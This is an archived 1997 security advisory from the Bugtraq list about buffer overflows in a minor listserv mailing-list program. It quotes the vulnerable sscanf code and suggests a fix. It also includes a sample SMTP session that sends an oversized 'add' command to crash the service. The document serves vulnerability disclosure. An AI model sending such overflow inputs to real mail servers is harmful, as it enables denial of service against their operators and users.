Buffer overflows in the listserv mailing list manager.

Summary
Description:Stander buffer overflow stuff, although this may not be exploitable.
Author:PLaGuEZ <root@MEAT.PLAGUEZ.ORG>
Compromise:Possibly just a DOS attack, unless you can make an exploit out of it.
Vulnerable Systems:Systems running unpatched versions of listserv.
Date:19 June 1997
Notes:This is NOT the L-Soft "listserv" program, instead it is a significantly less popular (and less powerful) listserv program available on sunsite.
Details


Date: Sat, 1 Jan 1994 17:50:59 +0100
From: PLaGuEZ <root@MEAT.PLAGUEZ.ORG>
To: BUGTRAQ@NETSPACE.ORG

listserv buffer overflow(s)


             plaguez security advisory no. 4

               listserv buffer overflow(s)



Hello all,

[forget it if it's known stuff :), however, the archives
from sunsite still have this hole.]


i have found several buffer overflows in listserv,
a widely used mailing-lists managment program.

By exploiting those vulnerabilities, malicious hackers can
remotely execute arbitrary commands on the target machine:
typically, place backdoors on the system or remove users'
mail files, as listserv requires to run as sgid 'mail'.

Though, the impact is harmless  because it is almost
impossible to predict the parameters to use for the
actual overflow, i.e. stack prediction and buffer size.
This hole is still annoying because it can provide a
efficient DOS attack: the attacker would repeatly
connect to the target host and send an oversized buffer,
resulting in many segfaults on the target system.


Technical stuff:
----------------
User commands are sent directly through the body of the
message, where users can write  whatever they want.
Potential buffer overflows are located in the functions
that handle those commands. ( main() bof are mostly
harmless)
e.g:
 +file subscribe.c,

   function subscription(char *from,char *command,int add,
    int outsider)
   { char tmp[256], grp[256], adr[256];
        [...]
       i=sscanf(command,"%s%s%s",tmp,adr,grp);
        [...]
        }
      command is there a user command that hasnt been
      modified. An overflow may occure there.





Sample exploit:
---------------

$ telnet xxxxxx.xxx 25

Trying 123.123.123.123...
Connected to 123.123.123.123
Escape character is '^]'.
220 xxxxxx.xxx ESMTP Sendmail 8.8.5/8.8.2; Fri, 20 Jun 1997 08:54:52 -0400
MAIL FROM: oooops@oooops.org
250 ooops ... Sender ok
RCPT TO: Listserv
250 Listserv ... Recipient ok
DATA
254 Enter mail, end with "." on a line by itself
From: noone

add aaaaaaaaaaaaaaa[...lotsa chars go here]aaaaaaaaaaaaa aaaaaa aaaaaa
.
250 RAFZ04965 Message accepted for delivery
QUIT
221 xxxxxxx.xxx closing connection

the listserv handling this session with bof and then crash.



Fix:
----
Sorry I'm too lazy to make a fix... A possible one would be
to use dynamic length strings, or (easier to implement)
strip each command down to its 200 first characters for
example.





that's all for this time,

plaguez





------------------------
   plaguez / libpcap
dube0866@eurobretagne.fr
  http://www.innu.org
------------------------
ln -sf  flames /dev/null

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]